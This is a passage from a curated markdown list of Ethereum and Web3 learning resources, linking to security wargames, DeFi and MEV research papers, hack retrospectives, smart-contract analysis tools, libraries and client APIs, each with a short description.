[Ethernaut by OpenZeppelin](https://ethernaut.openzeppelin.com/) - A collection of Web3 wargames inspired by [OverTheWire](https://overthewire.org/) in the context of the Ethereum Virtual Machine (EVM). Each level is a smart contract that needs to be hacked.\n- [Damn Vulnerable Defi](https://www.damnvulnerabledefi.xyz/) - An offensive security playground to learn red team cybersecurity in the context of DeFi and smart contracts. 
Examples include tasks where the user needs to stop the system from working, take out funds from a contract...\n- [Damn Vulnerable DeFi | Foundry](https://github.com/nicolasgarcia214/damn-vulnerable-defi-foundry) - Same as Damn Vulnerable DeFi but in the context of the foundry development framework.\n\n##### Web3 CTF (Capture The Flag)\n\n- [Capture the Ether](https://capturetheether.com/) - Traditional game consisting of a series of categorized challenges where the user earns points after every successful challenge. The goal is to make the `isComplete()` function return true.\n- [Paradigm CTF](https://ctf.paradigm.xyz/)\n\n#### DeFi\n\n- [Finematics](https://www.youtube.com/c/Finematics/featured) - Educational videos on DeFi\n- [Formal Analysis of Composable DeFi Protocols ](https://arxiv.org/pdf/2103.00540.pdf) - In this paper, authors propose a formal process-algebraic technique that models DeFi protocols in a compositional manner to allow for efficient property verification.\n- [Transaction Fee Mechanism Design](https://arxiv.org/pdf/2106.01340.pdf) - Authors explain the behavior of fees in blockchains.\n- [DeFi-ning DeFi: Challenges & Pathway](https://arxiv.org/pdf/2101.05589.pdf) - Good Retrospective into the beginning of decentralized finance.\n- [A theory of Automated Market Makers in DeFi](https://arxiv.org/pdf/2102.11350.pdf) - Authors exploit our theory to formally prove a set of fundamental properties of AMMs, characterizing both structural and economic aspects.\n- [From banks to DeFi: the evolution of the lending market](https://arxiv.org/pdf/2104.00970.pdf) - Authors discuss the persisting reliance of DeFi lending on the traditional financial system, and conclude with the outlook of the lending market in the IOV era.\n- [On the Just-In-Time Discovery of Profit-Generating Transactions in DeFi Protocols](https://arxiv.org/pdf/2103.02228.pdf) - In this paper, authors investigate two methods that allow them to automatically create profitable DeFi 
trades.\n- [Maximizing Extractable Value from Automated Market Makers](https://arxiv.org/pdf/2106.01870.pdf) - In this paper authors formally characterize rational miners as players which follow an optimal strategy in the mining game.\n- [The Decentralized Financial Crisis](https://arxiv.org/pdf/2002.08099.pdf) - In this paper authors explore how design weaknesses and price fluctuations in DeFi protocols could lead to a DeFi crisis.\n- [Liquidations: DeFi on a Knife-edge](https://arxiv.org/pdf/2009.13235v4.pdf)- In order to protect protocols from suffering losses, undercollateralized positions can be liquidated. In this paper, authors present empirical analysis of liquidations on protocols for loanable funds (PLFs).\n- [Measuring Asset Composability as a Proxy for DeFi Integration](https://arxiv.org/pdf/2102.04227.pdf) - Authors seek to understand the degree to which this practice may contribute to financial integration on Ethereum by examining transactions in 'composed' derivatives for the assets DAI, USDC, USDT, ETH and tokenized BTC for the full set of 344.8 million Ethereum transactions computed in 2020.\n- [Dynamic Curves for Decentralized Autonomous Cryptocurrency Exchanges](https://arxiv.org/pdf/2101.02778.pdf) - Authors propose in this work a new approach to constructing the AMM by proposing the idea of dynamic curves.\n- [High-Frequency Trading on Decentralized On-Chain Exchanges](https://arxiv.org/pdf/2009.14021.pdf) - In this work authors formalize, analytically exposit and empirically evaluate an augmented variant of front-running: sandwich attacks, which involve front- and back-running victim TXs.\n- [Flashot](https://arxiv.org/pdf/2102.00626.pdf) - A Snapshot of Flash Loan Attack on DeFi Ecosystem.\n- [DeFiRanger](https://arxiv.org/pdf/2104.15068.pdf) - Detecting Price Manipulation Attacks on DeFi Applications.\n- [Attacking the DeFi Ecosystem with Flash Loans for Fun and Profit](https://arxiv.org/pdf/2003.03810.pdf) - Flash Loans. DeFi. 
Classic.\n- [SoK: Decentralized Finance (DeFi) ](https://arxiv.org/pdf/2101.08778.pdf) - In this Systematization of Knowledge (SoK), authors delineate the DeFi ecosystem along its principal axes.\n- [Empirical Evidence from four Governance Token Distributions](https://arxiv.org/pdf/2102.10096.pdf) - This paper provides a framework to quantify decentralization of governance power among blockchain applications.\n- [The Adoption of Blockchain-based Decentralized Exchanges](https://arxiv.org/pdf/2103.08842.pdf) - Authors show that liquidity providers lose token value if exchange rates are volatile due to the order execution mechanism of the blockchain-based exchange.\n- [An analysis of Uniswap markets](https://arxiv.org/pdf/1911.03380.pdf) - One of the best studies on Uniswap DEX activity, authors started researching in 2019 and recently released fresh 2021 analysis.\n- [Finance 4.0: Design principles for a value-sensitive cryptoecnomic system to address sustainability](https://arxiv.org/pdf/2105.11955.pdf) - Authors provide new insights on designing crypto systems.\n- [Behavior of Liquidity Providers in Decentralized Exchanges](https://arxiv.org/pdf/2105.13822.pdf) - Authors aim to understand how liquidity providers react to market information and how they benefit from providing liquidity in DEX.\n- [Cyclic Arbitrage in Decentralized Exchange Markets](https://arxiv.org/pdf/2105.02784.pdf) - Good Read. 
This paper suggests that with the smart contract technology and the replicated state machine setting of Ethereum, arbitrage strategies are easier implemented in DEXes than in CEX.\n- [SoK: Oracles from the Ground Truth to Market Manipulation](https://arxiv.org/pdf/2106.00667.pdf) - In this SoK, authors systemize the design alternatives for oracles, showcase attacks, and discuss attack mitigation strategies.\n- [Composing Networks of Automated Market Makers](https://arxiv.org/pdf/2106.00083.pdf) - This paper proposes a mathematical model for AMM composition.\n- [Blockchain Oracle Design Patterns](https://arxiv.org/abs/2106.09349) - In this paper, authors will study and analyze blockchain oracles with regard to how they provide feedback to the blockchain and smart contracts.\n- [CeFi vs. DeFi - Comparing Centralized to Decentralized Finance](https://arxiv.org/abs/2106.08157) - In this work, authors systematically analyze the differences between CeFi and DeFi, covering legal, economic, security, privacy and market manipulation. Authors also provide a structured methodology to differentiate between a CeFi and a DeFi service.\n\n#### Ethereum Name Service\n\n- [Ethereum Name Service: the Good, the Bad, and the Ugly](https://arxiv.org/pdf/2104.05185.pdf) - Yet, no existing work has studied this emerging system, the security issues and misbehaviors in ENS. 
Authors present the first study of ENS by analyzing millions of event logs related to ENS.\n\n#### Non-Fungible Token (NFT):\n\n- [Mapping the NFT revolution](https://arxiv.org/pdf/2106.00647.pdf) - Market trends, trade networks and visual features.\n- [Fairness in ERC token markets](https://arxiv.org/pdf/2102.03721.pdf) - A Case Study of CryptoKitties.\n- [Non-Fungible Token: Overview, Evaluation, Opportunities and Challenges](https://arxiv.org/pdf/2105.07447.pdf) - In this technical report, authors explore the NFT ecosystems in several aspects.\n- [Networks of Ethereum Non-Fungible Tokens: A graph-based analysis of the ERC-721 ecosystem](https://arxiv.org/pdf/2110.12545.pdf)\n- [NFT School is an open-source project from web developers: NFT Basics, First Steps Tutorial, Minting Service Tutorial](https://nftschool.dev/)\n\n#### Stable-Coins:\n\n- [Stablecoins 2.0](https://arxiv.org/pdf/2006.12388.pdf) - Authors seek to provide a sound foundation for stablecoin theory, with a risk-based functional characterization of the economic structure of stablecoins.\n- [Reducing the Volatility of Cryptocurrencies — A Survey of Stablecoins](https://arxiv.org/pdf/2103.01340.pdf) - Authors discuss how stablecoins help reduce the volatility of cryptocurrencies by surveying different types of stablecoins and their stability mechanisms.\n- [Understand Volatility of Algorithmic Stablecoin: Modeling, Verification and Empirical Analysis](https://arxiv.org/pdf/2101.08423.pdf) - Authors performed a systematic empirical analysis on real transaction activities of the Basis Cash stablecoin to relate theoretical possibilities to market observations.\n- [T-Cash: Transferable Fiat Backed Coins](https://arxiv.org/pdf/2105.04485.pdf) - In this paper authors propose a transferable electronic cash scheme using blockchain technology which allows users to continuously reuse coins within the system.\n\n#### General information:\n\n- [A Big Data Analysis of the Ethereum Network: from Blockchain to 
Google Trends](https://arxiv.org/pdf/2104.01764.pdf) - An analysis of the crypto prices and search trends suggests the existence of big players (and not the regular users), manipulating the market after a drop in prices.\n- [A DLT-based Smart Contract Architecture for Atomic and Scalable Trading](https://arxiv.org/pdf/2105.02937.pdf) - In this paper, authors propose an atomic, scalable and privacy-preserving protocol that enables secure and dynamic updates. Then develop a smart contract-based Credit-Note System (CNS) that allows participants to lock funds before a state channel initialisation, which enhances flexibility and efficiency.\n- [Exploring Etherum Data Stores: A Cost and Performance Comparison ](https://arxiv.org/pdf/2105.10520.pdf) -In this work, authors examine a comprehensive set of data management approaches for ETH apps and assess the associated cost in gas as well as the retrieval performance.\n- [A Systematic Literature Review on Blockchain Governance](https://arxiv.org/pdf/2105.05460.pdf) - This study comprehensively investigates blockchain governance via 5W1H questions.\n- [A general framework for blockchain analytics](https://arxiv.org/pdf/1707.01021.pdf) - Authors propose a general-purpose framework, supporting data analytics on Bitcoin Ethereum — it allows to integrate block data with data from other sources, and to organise them in a database.\n- [AMR:Autonomous Coin Mixer with Privacy Preserving Reward Distribution](https://arxiv.org/pdf/2010.01056.pdf) - In this work, authors propose the first censorship resilient mixer, which can reward its users in a privacy-preserving manner for participating in the system.\n- [Technology Review of Blockchain Data Privacy Solutions](https://arxiv.org/pdf/2105.01316.pdf)- This report aims to review existing enterprise blockchain technologies: EOSIO powered systems, Hyperledger Fabric and Besu, Consensus Quorum, R3 Corda and Ernst and Young’s Nightfall.\n- [Blockchain Systems, Technologies and 
Applications: A Methodology Perspective](https://arxiv.org/pdf/2105.03572.pdf) - First, this article introduces how blockchain works, the research activity and challenge, and illustrates the roadmap involving the classic methodology with typical blockchain use cases and topics. Second, in blockchain system, how to adopt stochastic process, game theory, optimization, machine learning and cryptography to study blockchain running process and design blockchain protocol/algorithm are discussed in details.\n- [Ethna: Analyzing the Underlying Peer-to-Peer Network of the Ethereum Blockchain](https://arxiv.org/pdf/2010.01373.pdf) - Ethna implements a novel method that accurately measures the degrees of Ethereum nodes.\n- [Community Detection in Blockchain Social Networks](https://arxiv.org/pdf/2101.06406.pdf) - A novel community detection algorithm which is designed for low-rank signals on graph can help find users’ communities based on user-token subscription.\n- [Block Access Control in Wireless Blockchain Network: Design, Modeling and Analysis](https://arxiv.org/pdf/2104.13144.pdf) - The results show that BAC approaches can help the network to achieve a high transaction throughput while improving block utilization and saving computational power. 
Meanwhile, the trade-off between transaction throughput and block utilization is demonstrated, which can act as a guidance for practical deployment of blockchain.\n- [Towards External Calls for Blockchain and Distributed Ledger Technology](https://arxiv.org/pdf/2105.10399.pdf) - In this paper authors show that this belief is preconceived by demonstrating a method that enables blockchain and distributed ledger technologies to perform calls to external systems initiated from the blockchain/DLT itself.\n- [Managing Blockchain Systems and Applications: A Process Model for Blockchain Configurations](https://arxiv.org/pdf/2105.02118.pdf) - Authors demonstrate the applicability of the proposed blockchain configuration process model on four blockchain projects\n- [A Note on Optimal Fees for Constant Function Market Makers](https://arxiv.org/pdf/2105.13510.pdf) - Authors present framework that can be used to compute optimal fees for real world pools using past trade data.\n- [Reward Mechanism for Blockchains Using Evolutionary Game Theory](https://arxiv.org/pdf/2104.05849.pdf) - In this paper, authors develop a reward mechanism framework that could apply to many PoS blockchains.\n- [Summing Up Smart Transitions](https://arxiv.org/pdf/2105.07663.pdf) - In this paper, authors present a generalization of first-order logic which can express the unbounded sum of balances.\n- [100+ Metrics for Software Startups - A Multi-Vocal Literature Review](https://arxiv.org/pdf/1901.04819.pdf) - Using data in the form of metrics can help software startups to make the right decisions amidst uncertainty and limited resources.\n- [Blockchain Networks: Data Structures of Bitcoin , Monero, Zcash, Ethereum, Ripple and IOTA](https://arxiv.org/pdf/2103.08712.pdf) - Authors discuss how blockchain data can be abstracted as various types of networks, and how network abstractions used to reap insights into the structure.\n- [Decentralized Finance: On Blockchain- and Smart Contract-Based Financial 
Markets](https://research.stlouisfed.org/publications/review/2021/02/05/decentralized-finance-on-blockchain-and-smart-contract-based-financial-markets) - Written by Fabian Schar, gives an overview of blockchain based markets with technical details but in a digestible format; great paper for newcomers to the space.\n\n#### Special Author's compilations:\n\n- [All-about-NFT security](https://graph.org/NFT-security-01-28)\n- [All ETH security tools existing](https://graph.org/ETHSec-Tools-02-13)\n- [All good TG Dev communities](https://graph.org/Crypto-Telegram-Channels--Chats-04-19)\n- [Known smart contract-side and user-side attacks](https://graph.org/Data-02-14)\n- [Solidity A-Z](https://graph.org/Solidity-Cheatsheets-Pack-03-20)\n- [All known smart contract side and user side attacks](https://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)\n- [All possible transaction analysis, crypto-forensics and investigation tools list & references in a single note](https://graph.org/TX-Analysis-tools-04-19)\n- [Key principles of storing crypto cold wallet attacks defense methods best practices](https://graph.org/Key-principles-of-storing-crypto-cold-wallet-attacks-defense-methods-best-practices--Bonus-04-23)\n\n#### Side-Chains\n\n- [POA Network](https://www.poa.network/)\n- [POA Bridge](https://bridge.poa.net/)\n- [POA Bridge UI](https://github.com/poanetwork/bridge-ui)\n- [POA Bridge Contracts](https://github.com/poanetwork/poa-bridge-contracts)\n- [Loom Network](https://github.com/loomnetwork)\n- [Polygon Network](https://docs.polygon.technology/)\n\n#### EIP - 1559\n\n- [EIP1559 FAQ](https://notes.ethereum.org/@vbuterin/eip-1559-faq) - EIP1559 FAQ\n- [Dynamical Analysis of the EIP-1559 Ethereum Fee Market](https://arxiv.org/pdf/2102.10567.pdf) - Authors perform a thorough analysis of the resulting fee market dynamic mechanism via a combination of tools from game theory and dynamical systems.\n- [Stochastic Properties 
of EIP1559 Basefees](https://arxiv.org/pdf/2105.03521.pdf) - Authors explain the new pricing mechanism for the Ethereum developed to bring stability to fluctuating gas prices.\n- [Transaction Fee Mechanism Design for the Ethereum Blockchain: An Economic Analysis of EIP-1559](https://arxiv.org/pdf/2012.00854.pdf) - This report assesses the game-theoretic strengths and weaknesses of the proposal and explores some alternative designs.\n\n#### Ethereum 2.0\n\n- [How does the NEW Ethereum work?](https://www.preethikasireddy.com/post/how-does-the-new-ethereum-work)\n- [How does Ethereum work, anyway?](https://www.preethikasireddy.com/post/how-does-ethereum-work-anyway#Story)\n- [Serenity Design Rationale](https://notes.ethereum.org/@vbuterin/serenity_design_rationale)\n- [Specification](https://github.com/ethereum/annotated-spec)\n- [Beaconcha](https://beaconcha.in/)\n- [Beaconscan](https://beaconscan.com/)\n- [Ethereum 2.0 Stats](https://eth2stats.io/)\n- [Ethereum 2.0 Docs](https://docs.ethhub.io/ethereum-roadmap/ethereum-2.0/eth-2.0-phases/)\n- [Ethereum 2.0 Clients](https://docs.ethhub.io/ethereum-roadmap/ethereum-2.0/eth2.0-teams/teams-building-eth2.0/)\n- [Ethereum 2.0 Forks](https://eth2-fork-mon.stokes.io/)\n\n#### MEV - Maximal Extractable Value / Miner Extractable Value:\n\n- [Quantifying Blockchain Extractable Value: How dark is the forest?](https://arxiv.org/pdf/2101.05511v2.pdf) - Authors provide evidence that miners already extract Miner Extractable Value (MEV), which could destabilize the blockchain consensus security, as related work has shown.\n- [Flash Boys 2.0: Frontrunning, Transaction Reordering, and Consensus Instability in Decentralized Exchanges](https://arxiv.org/pdf/1904.05234.pdf) - Introduces the concept of MEV, the work highlights the large, complex risks created by transaction-ordering dependencies in smart contracts and the ways in which traditional forms of financial-market exploitation are adapting to and penetrating blockchain 
economies.\n- [Flashbots: MEV in Eth2](https://hackmd.io/@flashbots/mev-in-eth2) - In this post, authors study transaction ordering in eth2 and analyze MEV-enabled staking yields. Then they find that MEV will significantly boost validator rewards but may reinforce inequalities among participants of eth2. Authors also discuss qualitative aspects of MEV in eth2 such as the potential dynamics that will unfold between its largest stakeholders like exchanges and validator pools.\n- [A Survey on Blockchain Interoperability: Past, Present, and Future Trends](https://arxiv.org/abs/2005.14282) - In this post, authors study blockchain interoperability techniques and solutions, providing a holistic overview of blockchain interoperability, paving the way for systematic research in this domain.\n\n#### Discussion\n\n- [SmartContractResearch Forum](https://www.smartcontractresearch.org)\n- [ethresear.ch](https://ethresear.ch)\n- [ethereum-magicians.org](https://ethereum-magicians.org)\n- [speedrunethereum.com](https://speedrunethereum.com)\n- [Follow](https://t.me/s/officer_cia/760)\n\n#### Hacks in Web3\n\n- [All Resources to become a smart contract auditor](https://graph.org/All-resources-to-become-a-smart-contract-auditor-09-11)\n- [Retrospective: Hacks in Web3](https://officercia.medium.com/retrospective-hacks-in-web3-cc83b8ee0e93)\n- [Rekt News](https://rekt.eth.link/leaderboard) - Anonymous platform for whistleblowers and DeFi detectives to present their information to the community.\n- [Blockchain Threat Intelligence](https://blockthreat.substack.com/) - Newsletter covering the latest security news, tools, events, vulnerabilities, and threats in the cryptocurrency landscape. 
Also [supports this repo.](https://github.com/openblocksec/blocksec-incidents)\n- [Blockchain Graveyard](https://magoo.github.io/Blockchain-Graveyard/) - A list of all massive security breaches or thefts involving blockchains.\n\n# Tools Collection\n\n#### Ethereum Tools\n\n- [All ETH security tools existing](https://graph.org/ETHSec-Tools-02-13)\n- [Ethstats](https://ethstats.io)\n- [Node Stats](https://ethernodes.org)\n- [solidity-by-example.org](https://solidity-by-example.org)\n- [EVM Networks List](https://chainid.network)\n- [BIP39 Derivation](https://iancoleman.io/bip39)\n- [Vanity Generator](https://github.com/johguse/profanity)\n- [Web Vanity Generator](https://vanity-eth.tk)\n- [Vanity Eth Generators](https://github.com/search?q=eth+vanity)\n- [FindETH](https://findeth.io)\n- [Eth Tx Decoder](https://antoncoding.github.io/eth-tx-decoder)\n- [Ethereum input data decoder](https://lab.miguelmota.com/ethereum-input-data-decoder)\n- [Ethereum Gas Charts](https://ethereumprice.org/gas)\n- [Ethereum TxPool Statistics](https://txpool.zengo.com/)\n- [Gas Prices Dashboard ](https://explore.duneanalytics.com/public/dashboards/qswVMdzbyiiZFdnCDSwx1jfYLOjdaokM4CSGNxsH)\n- [The UI from ABI](https://ethcontract.watch)\n- [Oracles Club](https://oracles.club)\n- [Tx Combo](https://furucombo.app)\n- [ETH or ERC-20 Mass-sender](https://disperse.app)\n- [BulkSender](https://bulksender.app)\n- [ERC20 Meta Token Wrapper](https://github.com/arcadeum/erc20-meta-token)\n- [Cancel Ethereum Transaction](https://github.com/mds1/Cancel-Ethereum-Transactions)\n- [Fees WTF Calculator](https://fees.wtf)\n- [Spend Gas Stats](https://txn.finance)\n- [Pools Stats](https://pools.fyi)\n- [Solhint](https://github.com/protofire/solhint)\n- [Solium](https://github.com/duaraghav8/Solium)\n- [Sol-tester](https://github.com/androlo/sol-tester)\n- [Solidity-coverage](https://github.com/sc-forks/solidity-coverage)\n- [TypeChain](https://github.com/ethereum-ts/TypeChain)\n- 
[Tenderly](https://tenderly.co/)\n- [Contract Library](https://library.dedaub.com/)\n\n#### Libraries\n\n- [dapp-bin](https://github.com/ethereum/dapp-bin) - Ethereum repo providing implementations for many common data structures and utilities in Solidity, Serpent and LLL.\n- [Solidity Collections](https://github.com/ethereum/wiki/wiki/Solidity-Collections) - Collections of code snippets and utility libraries.\n- [OpenZeppelin](https://openzeppelin.org/) - Framework to build secure smart contracts.\n\n#### Ideas\n\n- [Open DeFi Problems](https://mirror.xyz/0xemperor.eth/0guEj0CYt5V8J5AKur2_UNKyOhONr1QJaG4NGDF0YoQ)\n- [What to build?](https://github.com/0xngmi/ideas)\n- [Startup ideas](https://alliancedao.notion.site/Crypto-Web3-Startup-Ideas-2023-Edition-48d40ccadeeb42a48056659fcce109b1)\n- [polymarket.com](https://polymarket.com)\n- [How to use PolyMarket](https://medium.com/coinmonks/how-to-use-polymarket-9ee1577fd671)\n- [Ideas Lists](https://sovs.notion.site/Education-00cadae763ea4d30ae8149041718fd7a)\n- [hummingbot.org](https://hummingbot.org/)\n- [t.me/soliditypedia](https://t.me/soliditypedia)\n- [My Blog!](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)\n\n#### Popular Smart Contract Libraries\n\n- [Zeppelin](https://github.com/OpenZeppelin/openzeppelin-contracts) - Contains tested reusable smart contracts like SafeMath and OpenZeppelin SDK [library](https://github.com/OpenZeppelin/openzeppelin-sdk) for smart contract upgradeability\n- [cryptofin-solidity](https://github.com/cryptofinlabs/cryptofin-solidity) - A collection of Solidity libraries for building secure and gas-efficient smart contracts on Ethereum.\n- [Modular Libraries](https://github.com/Modular-Network/ethereum-libraries) - A group of packages built for use on blockchains utilising the Ethereum Virtual Machine\n- [DateTime Library](https://github.com/bokkypoobah/BokkyPooBahsDateTimeLibrary) - A gas-efficient Solidity date and time library\n- 
[ARC](https://github.com/daostack/arc) - an operating system for DAOs and the base layer of the DAO stack.\n- [0x](https://github.com/0xProject) - DEX protocol\n- [Token Libraries with Proofs](https://github.com/sec-bit/tokenlibs-with-proofs) - Contains correctness proofs of token contracts wrt. given specifications and high-level properties\n- [Provable API](https://github.com/provable-things/ethereum-api) - Provides contracts for using the Provable service, allowing for off-chain actions, data-fetching, and computation\n- [ABDK Libraries for Solidity](https://github.com/abdk-consulting/abdk-libraries-solidity) - Fixed-point (64.64 bit) and IEEE-754 compliant quad precision (128 bit) floating-point math libraries for Solidity\n\n#### Patterns for Smart Contracts\n\n- [Dappsys: Safe, simple, and flexible Ethereum contract building blocks](https://github.com/dapphub/dappsys)\n- [MakerDAO](https://github.com/makerdao/maker-otc)\n- [The TAO](https://github.com/ryepdx/the-tao)\n- [Dapp-a-day 1-10](https://steemit.com/@nikolai)\n- [Dapp-a-day 11-25](https://steemit.com/@nexusdev)\n- [OpenZeppelin Contracts: An open framework of reusable and secure smart contracts in the Solidity language.](https://github.com/OpenZeppelin/openzeppelin-contracts)\n- [Blog about Best Practices with Security Audits](https://blog.openzeppelin.com/)\n- [Advanced Workshop with Assembly](https://github.com/androlo/solidity-workshop)\n- [Simpler Ethereum Multisig](https://medium.com/@ChrisLundkvist/exploring-simpler-ethereum-multisig-contracts-b71020c19037) - especially section _Benefits_\n- [CryptoFin Solidity Auditing Checklist](https://github.com/cryptofinlabs/audit-checklist) - A checklist of common findings, and issues to watch out for when auditing a contract for a mainnet launch.\n- [aragonOS: A smart contract framework for building DAOs, Dapps and protocols](https://hack.aragon.org/docs/aragonos-intro.html)\n- [Checks Effects Interactions 
Pattern](https://fravoll.github.io/solidity-patterns/checks_effects_interactions.html)\n\n#### Upgradeability\n\n- [Blog by Elena Dimitrova, Dev at colony.io](https://blog.colony.io/author/elena/)\n- [Library driven development](https://blog.aragon.org/library-driven-development-in-solidity-2bebcaf88736)\n- [Advanced Solidity code deployment techniques](https://blog.aragon.org/advanced-solidity-code-deployment-techniques-dc032665f434/)\n- [OpenZeppelin on Proxy Libraries](https://blog.openzeppelin.com/proxy-libraries-in-solidity-79fbe4b970fd/)\n\n#### Developer Tools\n\n- [Check out our blog!](https://blog.pessimistic.io/)\n- [CryptoFin Solidity Auditing Checklist](https://github.com/cryptofinlabs/audit-checklist) - A checklist of common findings, and issues to watch out for when auditing a contract for a mainnet launch.\n- [MythX](https://mythx.io/) - Security verification platform and tools ecosystem for Ethereum developers\n- [Mythril](https://github.com/ConsenSys/mythril) - Open-source EVM bytecode security analysis tool\n- [Oyente](https://github.com/melonproject/oyente) - Alternative static smart contract security analysis\n- [Securify](https://securify.chainsecurity.com/) - Security scanner for Ethereum smart contracts\n- [SmartCheck](https://tool.smartdec.net/) - Static smart contract security analyzer\n- [Ethersplay](https://github.com/crytic/ethersplay) - EVM disassembler\n- [Evmdis](https://github.com/Arachnid/evmdis) - Alternative EVM disassembler\n- [Hydra](https://github.com/IC3Hydra/Hydra) - Framework for cryptoeconomic contract security, decentralised security bounties\n- [Solgraph](https://github.com/raineorshine/solgraph) - Visualise Solidity control flow for smart contract security analysis\n- [Manticore](https://github.com/trailofbits/manticore) - Symbolic execution tool on Smart Contracts and Binaries\n- [Slither](https://github.com/crytic/slither) - A Solidity static analysis framework\n- [Adelaide](https://github.com/sec-bit/adelaide) - The 
SECBIT static analysis extension to Solidity compiler\n- [solc-verify](https://github.com/SRI-CSL/solidity/) - A modular verifier for Solidity smart contracts\n- [Solidity security blog](https://github.com/sigp/solidity-security-blog) - Comprehensive list of known attack vectors and common anti-patterns\n- [Awesome Buggy ERC20 Tokens](https://github.com/sec-bit/awesome-buggy-erc20-tokens) - A Collection of Vulnerabilities in ERC20 Smart Contracts With Tokens Affected\n- [Free Smart Contract Security Audit](https://callisto.network/smart-contract-audit/) - Free smart contract security audits from Callisto Network\n- [Piet](https://piet.slock.it) - A visual Solidity architecture analyzer\n- [Contract Library](https://library.dedaub.com) - Decompiler and vulnerability scanner for deployed contracts\n\n#### Frontend Ethereum APIs\n\n- [Web3.js](https://github.com/ethereum/web3.js/) - Javascript Web3\n- [Eth.js](https://github.com/ethjs) - Javascript Web3 alternative\n- [Ethers.js](https://github.com/ethers-io/ethers.js/) - Javascript Web3 alternative, useful utilities and wallet features\n- [light.js](https://github.com/paritytech/js-libs/tree/master/packages/light.js) A high-level reactive JS library optimized for light clients.\n- [Web3Wrapper](https://github.com/0xProject/0x-monorepo/tree/development/packages/web3-wrapper) - Typescript Web3 alternative\n- [Ethereumjs](https://github.com/ethereumjs/) - A collection of utility functions for Ethereum like [ethereumjs-util](https://github.com/ethereumjs/ethereumjs-util) and [ethereumjs-tx](https://github.com/ethereumjs/ethereumjs-tx)\n- [Alchemy](https://docs.alchemy.com/docs)\n- [flex-contract](https://github.com/merklejerk/flex-contract) and [flex-ether](https://github.com/merklejerk/flex-ether) - Modern, zero-configuration, high-level libraries for interacting with smart contracts and making transactions.\n- [ez-ens](https://github.com/merklejerk/ez-ens) - Simple, zero-configuration Ethereum Name Service address 
resolver.\n- [web3x](https://github.com/xf00f/web3x) - A TypeScript port of web3.js. Benefits includes tiny builds and full type safety, including when interacting with contracts.\n- [Nethereum](https://github.com/Nethereum/) - Cross-platform Ethereum development framework\n- [dfuse](https://github.com/dfuse-io/client-js) - A TypeScript library to use [dfuse Ethereum API](https://dfuse.io)\n- [Drizzle](https://github.com/truffle-box/drizzle-box) - Redux library to connect a frontend to a blockchain\n- [Tasit SDK](https://github.com/tasitlabs/tasitsdk) - A JavaScript SDK for making native mobile Ethereum dapps using React Native\n- [useMetamask](https://github.com/mdtanrikulu/use-metamask) - a custom React Hook to manage Metamask in Ethereum ĐApp projects\n- [WalletConnect](https://walletconnect.org/) - Open protocol for connecting Wallets to Dapps\n- Strictly Typed - Javascript alternatives\n- [elm-ethereum](https://github.com/cmditch/elm-ethereum)\n- [purescript-web3](https://github.com/f-o-a-m/purescript-web3)\n- [ChainAbstractionLayer](https://github.com/liquality/chainabstractionlayer) - Communicate with different blockchains (including Ethereum) using a single interface.\n- [Delphereum](https://github.com/svanas/delphereum) - a Delphi interface to the Ethereum blockchain that allows for development of native dApps for Windows, macOS, iOS, and Android.\n- [Torus](https://tor.us/) - Open-sourced SDK to build dapps with a seamless onboarding UX\n- [Fortmatic](https://fortmatic.com/) - A simple to use SDK to build web3 dApps without extensions or downloads.\n- [Portis](https://portis.io/) - A non-custodial wallet with an SDK that enables easy interaction with DApps without installing anything.\n- [create-eth-app](https://github.com/paulrberg/create-eth-app) - Create Ethereum-powered front-end apps with one command.\n- [Scaffold-ETH](https://github.com/austintgriffith/scaffold-eth) - Beginner friendly forkable github for getting started building smart contracts.\n- 
[Jolly Roger](https://jolly-roger.eth.link/) - dApp framework using ethereum, buidler, svelte and thegraph\n- [Notify.js](https://blocknative.com/notify) - Deliver real-time notifications to your users. With built-in support for Speed-Ups and Cancels, Blocknative Notify.js helps users transact with confidence. Notify.js is easy to integrate and quick to customize.\n\n#### Backend Ethereum APIs\n\n- [Web3.py](https://github.com/ethereum/web3.py) - Python Web3\n- [Web3.php](https://github.com/sc0Vu/web3.php) - PHP Web3\n- [Ethereum-php](https://github.com/digitaldonkey/ethereum-php) - PHP Web3\n- [Web3j](https://github.com/web3j/web3j) - Java Web3\n- [Nethereum](https://nethereum.com/) - .Net Web3\n- [Ethereum.rb](https://github.com/EthWorks/ethereum.rb) - Ruby Web3\n- [rust-web3](https://github.com/tomusdrw/rust-web3) - Rust Web3\n- [ethers-rs](https://github.com/gakonst/ethers-rs/) - Ethers-rs\n- [Web3.hs](https://hackage.haskell.org/package/web3) - Haskell Web3\n- [KEthereum](https://github.com/komputing/KEthereum) - Kotlin Web3\n- [Eventeum](https://github.com/ConsenSys/eventeum) - A bridge between Ethereum smart contract events and backend microservices, written in Java by Kauri\n- [Ethereumex](https://github.com/mana-ethereum/ethereumex) - Elixir JSON-RPC client for the Ethereum blockchain\n- [Ethereum-jsonrpc-gateway](https://github.com/HydroProtocol/ethereum-jsonrpc-gateway) - A gateway that allows you to run multiple Ethereum nodes for redundancy and load-balancing purposes. Can be ran as an alternative to (or on top of) Infura. 
Written in Golang.\n- [EthContract](https://github.com/AgileAlpha/eth_contract) - A set of helper methods to help query ETH smart contracts in Elixir\n- [Ethereum Contract Service](https://github.com/mesg-foundation/service-ethereum-contract) - A MESG Service to interact with any Ethereum contract based on its address and ABI.\n- [Ethereum Service](https://github.com/mesg-foundation/service-ethereum) - A MESG Service to interact with events from Ethereum and interact with it.\n- [Marmo](https://marmo.io/) - Python, JS, and Java SDK for simplifying interactions with Ethereum. Uses relayers to offload transaction costs to relayers.\n- [Ethereum Logging Framework](https://bitbucket.csiro.au/users/kli039/repos/ethereum-logging-framework/browse) - provides advanced logging capabilities for Ethereum applications and networks including a query language, query processor, and logging code generation\n\n#### Ethereum Clients\n\n- [Besu](https://besu.hyperledger.org/en/latest/) - an open-source Ethereum client developed under the Apache 2.0 license and written in Java. 
